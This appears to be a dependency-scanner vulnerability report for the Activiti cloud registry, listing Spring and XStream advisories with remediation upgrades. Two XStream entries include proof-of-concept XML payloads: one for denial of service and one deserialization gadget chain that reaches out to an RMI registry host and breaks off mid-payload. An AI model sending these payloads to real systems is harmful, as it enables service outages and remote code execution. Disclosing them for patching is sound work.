  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via static resource resolution. An attacker can cause denial of service by sending crafted requests that are slow to resolve when accessing file-system-backed static resources, causing HTTP connections to remain occupied and exhausting server resources.

Note: This is only exploitable if all the following are true:

  1. The application uses Spring MVC or Spring WebFlux.

  2. Static resources are served from the file system.

  3. The application is running on Windows.

Remediation

Upgrade org.springframework:spring-core to version 6.2.18, 7.0.7 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<linked-hash-set>
  <sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>
    <sun.reflect.annotation.AnnotationInvocationHandler>
      <default>
        <memberValues class='javax.script.SimpleBindings'>
          <map class='javax.script.SimpleBindings' reference='..'/>
        </memberValues>
        <type>javax.xml.transform.Templates</type>
      </default>
    </sun.reflect.annotation.AnnotationInvocationHandler>
  </sun.reflect.annotation.AnnotationInvocationHandler>
</linked-hash-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Server-Side Request Forgery (SSRF)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.

Note: This vulnerability does not exist running Java 15 or higher, and is only relevant when using XStream's default blacklist.

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.15 or higher.

References

Server-Side Request Forgery (SSRF) vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.

PoC

<!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: -->

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
              <soapPart/>
              <mm>
                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                  <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                    <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                      <names>
                        <string>aa</string>
                        <string>aa</string>
                      </names>
                      <ctx>
                        <environment/>
                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                          <java.rmi.server.RemoteObject>
                            <string>UnicastRef</string>
                            <string>ip2</string>
                            <int>1099</int>
                            <long>0</long>
                            <int>0</int>
                            <short>0</short>
                            <boolean>false</boolean>
                          </java.rmi.server.RemoteObject>
